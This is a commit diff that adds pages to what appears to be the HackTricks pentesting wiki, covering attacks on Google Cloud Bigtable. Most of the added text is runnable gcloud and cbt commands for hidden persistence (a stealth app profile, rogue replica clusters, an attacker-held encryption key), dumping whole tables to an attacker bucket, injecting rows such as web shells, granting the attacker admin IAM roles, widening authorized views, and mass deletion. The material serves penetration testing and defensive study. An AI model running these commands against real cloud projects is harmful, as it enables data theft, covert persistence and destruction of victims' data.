This commit is contained in:
carlospolop
2025-11-19 15:32:45 +01:00
parent 7c16632a63
commit d25a46d41c
4 changed files with 537 additions and 2 deletions


@@ -0,0 +1,58 @@
# GCP - Bigtable Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
For more information about Bigtable check:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### Dedicated attacker App Profile
**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.
Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"
gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS
```
As long as this profile exists you can reconnect using fresh credentials that reference it.
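If you later want to reuse it, point your client at the profile explicitly. A minimal sketch with `cbt` (the trailing `app-profile=` and `count=` arguments are assumed to be accepted by its data commands):
```bash
# Reconnect later through the stealth profile instead of the default one
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> app-profile=stealth-profile count=10
```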
### Maintain your own replica cluster
**Permissions:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.
Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
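When it is time to pull data, a quick scale-up of the rogue cluster could look like this (the node counts are arbitrary examples):
```bash
# Scale the hidden replica up right before exfiltration, then back down afterwards
gcloud bigtable clusters update dark-clone --instance=<instance-id> --num-nodes=3
gcloud bigtable clusters update dark-clone --instance=<instance-id> --num-nodes=1
```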
### Lock replication behind your own CMEK
**Permissions:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` on the attacker-owned key.
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
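A sketch of that kill switch from the attacker project (key version, ring and key names are placeholders):
```bash
# Disable the key version to freeze the CMEK-protected replica...
gcloud kms keys versions disable 1 \
  --project=<attacker-proj> --location=<kms-location> \
  --keyring=<ring> --key=<key>
# ...and re-enable it whenever you want the cluster usable again
gcloud kms keys versions enable 1 \
  --project=<attacker-proj> --location=<kms-location> \
  --keyring=<ring> --key=<key>
```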
{{#include ../../../banners/hacktricks-training.md}}


@@ -0,0 +1,271 @@
# GCP - Bigtable Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
For more information about Bigtable check:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
> [!TIP]
> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
>
> ```bash
> gcloud components install cbt
> ```
### Read rows
**Permissions:** `bigtable.tables.readRows`
`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.
```bash
# Install cbt
gcloud components update
gcloud components install cbt
# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
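If you only need a peek, narrow the scan instead of dumping everything (the `count=` and `prefix=` arguments are assumed to be accepted by `cbt read`):
```bash
# Sample a handful of rows instead of scanning the whole table
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> count=20
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> prefix=<row-prefix> count=20
```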
### Write rows
**Permissions:** `bigtable.tables.mutateRows` (plus `bigtable.tables.readRows` to confirm the change).
Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> lookup <table-id> user#1337
```
`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
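For instance, a sketch of pushing a binary payload into a cell (the row key, family and column are made-up examples):
```bash
# Hypothetical example: stage a raw payload locally, then upsert it as cell bytes
printf 'serialized-backdoor-config' > /tmp/payload.bin
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> cfg#global settings:blob=@/tmp/payload.bin
```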
### Dump rows to your bucket
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
It's possible to exfiltrate the contents of an entire table by launching a Dataflow job that streams its rows into a GCS bucket you control.
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over some SA with enough permissions to perform the export (by default, if not indicated otherwise, the default compute SA will be used).
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run dump-bigtable3 \
--gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
--project=gcp-labs-3uis1xlx \
--region=us-central1 \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
> [!NOTE]
> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
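For example, a Parquet export (a useful starting point for the import technique below) might look like the following; the parameter names are assumed to mirror the JSON template, so verify them against the template metadata before running:
```bash
gcloud dataflow jobs run export-bt-parquet-$(date +%s) \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Parquet \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,outputDirectory=gs://<BUCKET>/import/,filenamePrefix=parquet_prefx \
  --staging-location=gs://<BUCKET>/staging/
```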
### Import rows
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
It's possible to overwrite or extend the contents of an entire table by launching a Dataflow job that reads rows from a GCS bucket you control and writes them into Bigtable. For this the attacker first needs a Parquet file with the data to import in the expected schema. An attacker could first export the data in Parquet format following the previous technique with the `Cloud_Bigtable_to_GCS_Parquet` template and then add new entries to the downloaded Parquet file.
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over some SA with enough permissions to perform the import (by default, if not indicated otherwise, the default compute SA will be used).
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/GCS_Parquet_to_Cloud_Bigtable \
--project=<PROJECT> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=us-central1 \
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
--project=gcp-labs-3uis1xlx \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
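To tamper with the exported Parquet before re-importing it, something like the following sketch can be used (pyarrow is assumed to be installed, the file names come from the example above, and the template's exact schema should be inspected first):
```bash
python3 - <<'PY'
import pyarrow as pa
import pyarrow.parquet as pq

# Hypothetical sketch: clone an existing row, tweak it and append it before re-import
table = pq.read_table("parquet_prefx-00000-of-00001.parquet")
print(table.schema)       # inspect the layout produced by the export template
rows = table.to_pylist()
forged = dict(rows[0])    # copy a legitimate row and modify its cells as needed
rows.append(forged)
pq.write_table(pa.Table.from_pylist(rows, schema=table.schema), "bigtable_import.parquet")
PY
```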
### Restoring backups
**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.
An attacker with these permissions can restore a backup into a new table under their control to recover old sensitive data.
```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
--cluster=<CLUSTER_ID_SOURCE>
gcloud bigtable instances tables restore \
--source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
--async \
--destination=<TABLE_ID_NEW> \
--destination-instance=<INSTANCE_ID_DESTINATION> \
--project=<PROJECT_ID_DESTINATION>
```
### Undelete tables
**Permissions:** `bigtable.tables.undelete`
Bigtable supports soft-deletion with a grace period (7 days by default). During this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.
This is particularly useful for:
- Recovering data from tables deleted by defenders during incident response
- Accessing historical data that was intentionally purged
- Reversing accidental or malicious deletions to maintain persistence
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
--show-deleted
# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```
> [!NOTE]
> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.
### Create Authorized Views
**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish **exactly the sensitive column/row sets** you care about and whitelist your own principal.
> [!WARNING]
> The catch is that to create an authorized view you also need to be able to read and mutate rows in the base table, so you do not gain any extra access and this technique is mostly useless on its own.
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
  "subsetView": {
    "rowPrefixes": ["acct#"],
    "familySubsets": {
      "pii": {
        "qualifiers": ["cc_number", "cc_cvv"]
      }
    }
  }
}
EOF
gcloud bigtable authorized-views create card-dump \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/credit-cards.json
gcloud bigtable authorized-views add-iam-policy-binding card-dump \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```
Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.
### Read Authorized Views
**Permissions:** `bigtable.authorizedViews.readRows`
If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will probably limit what you can access from the table. Below is an example using Python:
```python
from google.cloud.bigtable_v2 import BigtableClient
from google.cloud.bigtable_v2 import ReadRowsRequest

# Set your project, instance, table and authorized view ids
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"

data_client = BigtableClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"

request = ReadRowsRequest(
    authorized_view_name=authorized_view_name
)

# Stream the row chunks that the authorized view exposes
for response in data_client.read_rows(request=request):
    for chunk in response.chunks:
        if chunk.row_key:
            row_key = chunk.row_key.decode("utf-8") if isinstance(chunk.row_key, bytes) else chunk.row_key
            print(f"Row: {row_key}")
        if chunk.family_name:
            family = chunk.family_name.value if hasattr(chunk.family_name, "value") else chunk.family_name
            qualifier = chunk.qualifier.value.decode("utf-8") if hasattr(chunk.qualifier, "value") else chunk.qualifier.decode("utf-8")
            value = chunk.value.decode("utf-8") if isinstance(chunk.value, bytes) else str(chunk.value)
            print(f"  {family}:{qualifier} = {value}")
```
### Denial of Service via Delete Operations
**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:
- **`bigtable.appProfiles.delete`**: Delete application profiles, breaking client connections and routing configurations
- **`bigtable.authorizedViews.delete`**: Remove authorized views, cutting off legitimate access paths for applications
- **`bigtable.authorizedViews.deleteTagBinding`**: Remove tag bindings from authorized views
- **`bigtable.backups.delete`**: Destroy backup snapshots, eliminating disaster recovery options
- **`bigtable.clusters.delete`**: Delete entire clusters, causing immediate data unavailability
- **`bigtable.instances.delete`**: Remove complete Bigtable instances, wiping out all tables and configurations
- **`bigtable.tables.delete`**: Delete individual tables, causing data loss and application failures
```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
--instance=<instance-id>
# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
--instance=<instance-id> --table=<table-id>
# Delete a backup
gcloud bigtable backups delete <backup-id> \
--instance=<instance-id> --cluster=<cluster-id>
# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
--instance=<instance-id>
# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
--instance=<instance-id>
# Delete an entire instance
gcloud bigtable instances delete <instance-id>
```
> [!WARNING]
> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.
{{#include ../../../banners/hacktricks-training.md}}


@@ -0,0 +1,116 @@
# GCP - Bigtable Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
For more information about Bigtable check:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### `bigtable.instances.setIamPolicy`
**Permissions:** `bigtable.instances.setIamPolicy` (and usually `bigtable.instances.getIamPolicy` to read the current bindings).
Owning the instance IAM policy lets you grant yourself **`roles/bigtable.admin`** (or any custom role) which cascades to every cluster, table, backup and authorized view in the instance.
```bash
gcloud bigtable instances add-iam-policy-binding <instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
> [!TIP]
> If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it.
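A minimal sketch of that approach (this overwrites any existing bindings, so only use it if losing them is acceptable):
```bash
# Push a fresh policy that (at least) keeps the attacker as instance admin
cat > /tmp/policy.json <<'EOF'
{
  "bindings": [
    {
      "role": "roles/bigtable.admin",
      "members": ["user:<attacker@example.com>"]
    }
  ]
}
EOF
gcloud bigtable instances set-iam-policy <instance-id> /tmp/policy.json
```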
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) for more ways to abuse Bigtable permissions.
### `bigtable.tables.setIamPolicy`
**Permissions:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).
Instance policies can be locked down while individual tables are delegated. If you can edit the table IAM you can **promote yourself to owner of the target dataset** without touching other workloads.
```bash
gcloud bigtable tables add-iam-policy-binding <table-id> \
--instance=<instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
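Once the binding propagates, a quick sample read should confirm the escalation (the `count=` argument is assumed to be accepted by `cbt read`):
```bash
# Confirm the new table-level access by sampling a few rows
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> count=5
```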
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) for more ways to abuse Bigtable permissions.
### `bigtable.backups.setIamPolicy`
**Permissions:** `bigtable.backups.setIamPolicy`
Backups can be restored to **any instance in any project** you control. First, give your identity access to the backup, then restore it into a sandbox where you hold Admin/Owner roles.
If you have the permission `bigtable.backups.setIamPolicy` you can grant yourself `bigtable.backups.restore` to restore old backups and try to access sensitive information.
```bash
# Take ownership of the snapshot
gcloud bigtable backups add-iam-policy-binding <backup-id> \
--instance=<instance-id> --cluster=<cluster-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to restore a backup.
### Update authorized view
**Permissions:** `bigtable.authorizedViews.update`
Authorized Views are supposed to redact rows/columns. Modifying or deleting them **removes the fine-grained guardrails** that defenders rely on.
```bash
# Describe the authorized view to get a family name used in the current table
gcloud bigtable authorized-views describe <view-id> \
  --instance=<instance-id> --table=<table-id>
# JSON example not filtering any row or column
cat <<'EOF' > /tmp/permissive-view.json
{
  "subsetView": {
    "rowPrefixes": [""],
    "familySubsets": {
      "<SOME FAMILY NAME USED IN THE CURRENT TABLE>": {
        "qualifierPrefixes": [""]
      }
    }
  }
}
EOF
# Broaden the subset by uploading the permissive definition
gcloud bigtable authorized-views update <view-id> \
  --instance=<instance-id> --table=<table-id> \
  --definition-file=/tmp/permissive-view.json --ignore-warnings
```
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to read from an authorized view.
### `bigtable.authorizedViews.setIamPolicy`
**Permissions:** `bigtable.authorizedViews.setIamPolicy`.
An attacker with this permission can grant themselves access to an Authorized View, which may contain sensitive data that they would not otherwise have access to.
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.viewer'
```
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to read from an authorized view.
{{#include ../../../banners/hacktricks-training.md}}


@@ -2,9 +2,72 @@
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Google Cloud Bigtable is a fully managed, scalable NoSQL database designed for applications that require extremely high throughput and low latency. It's built to handle massive amounts of data (petabytes across thousands of nodes) while still providing quick read and write performance. Bigtable is ideal for workloads such as time-series data, IoT telemetry, financial analytics, personalization engines, and large-scale operational databases. It uses a sparse, distributed, multidimensional sorted map as its underlying storage model, which makes it efficient at storing wide tables where many columns may be empty. [Learn more](https://cloud.google.com/bigtable).
### Hierarchy
1. **Bigtable Instance**
A Bigtable instance is the top-level resource you create.
It doesn't store data by itself; think of it as a logical container that groups your clusters and tables together.
Two types of instances exist:
- Development instance (single-node, cheap, not for production)
- Production instance (can have multiple clusters)
2. **Clusters**
A cluster contains the actual compute and storage resources used to serve Bigtable data.
- Each cluster lives in a single region.
- It is made up of nodes, which provide CPU, RAM, and network capacity.
- You can create multi-cluster instances for high availability or global reads/writes.
- Data is automatically replicated between clusters in the same instance.
Important:
- Tables belong to the instance, not to a specific cluster.
- Clusters simply provide the resources to serve the data.
3. **Tables**
A table in Bigtable is similar to a table in NoSQL databases:
- Data is stored in rows, identified by a row key.
- Each row contains column families, which contain columns.
- It is sparse: empty cells do not consume space.
- Bigtable stores data sorted lexicographically by the row key.
Tables are served by all clusters in the instance.
4. **Tablets (and Hot Tablets)**
Bigtable splits each table into horizontal partitions called tablets. A tablet is:
- A contiguous range of row keys.
- Stored on a single node at any given moment.
- Tablets are automatically split, merged, and moved by Bigtable.
A **hot tablet** occurs when:
- Too many reads or writes hit the same row-key range (same tablet).
- That specific tablet/node becomes overloaded.
- This leads to hotspots (performance bottlenecks).
5. **Authorized Views**
Authorized views allow you to create a subset of a table's data that can be shared with specific users or applications without giving them access to the entire table. This is useful for:
- Limiting access to sensitive data.
- Providing read-only access to specific columns or rows.
6. **App Profiles**
A Bigtable app profile is a configuration that defines how a specific application or client should interact with a Bigtable instance, especially in environments with multiple clusters. It controls routing behavior, i.e. whether requests should be directed to a single cluster or distributed across multiple clusters for high availability, and whether single-row transactional writes are allowed (only possible with single-cluster routing), as sketched in the example below.
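A minimal sketch of creating both routing flavours (profile ids and descriptions are placeholders):
```bash
# Single-cluster routing (allows transactional / single-row writes)
gcloud bigtable app-profiles create single-route --instance <INSTANCE> \
  --route-to <CLUSTER> --transactional-writes --description "single cluster"
# Multi-cluster routing (any cluster may serve the request)
gcloud bigtable app-profiles create multi-route --instance <INSTANCE> \
  --route-any --description "multi cluster"
```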
```bash
# Cloud Bigtable
@@ -16,6 +79,11 @@ gcloud bigtable instances get-iam-policy <instance>
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Tables
gcloud bigtable tables list --instance <INSTANCE>
gcloud bigtable tables describe --instance <INSTANCE> <TABLE>
gcloud bigtable tables get-iam-policy --instance <INSTANCE> <TABLE>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE> <backupname>
@@ -27,8 +95,30 @@ gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE> <app-prof>
## Authorized Views
gcloud bigtable authorized-views list --instance <INSTANCE> --table <TABLE>
gcloud bigtable authorized-views describe --instance <INSTANCE> --table <TABLE> <VIEW>
```
## Privilege Escalation
{{#ref}}
../gcp-privilege-escalation/gcp-bigtable-privesc.md
{{#endref}}
## Post Exploitation
{{#ref}}
../gcp-post-exploitation/gcp-bigtable-post-exploitation.md
{{#endref}}
## Persistence
{{#ref}}
../gcp-persistence/gcp-bigtable-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}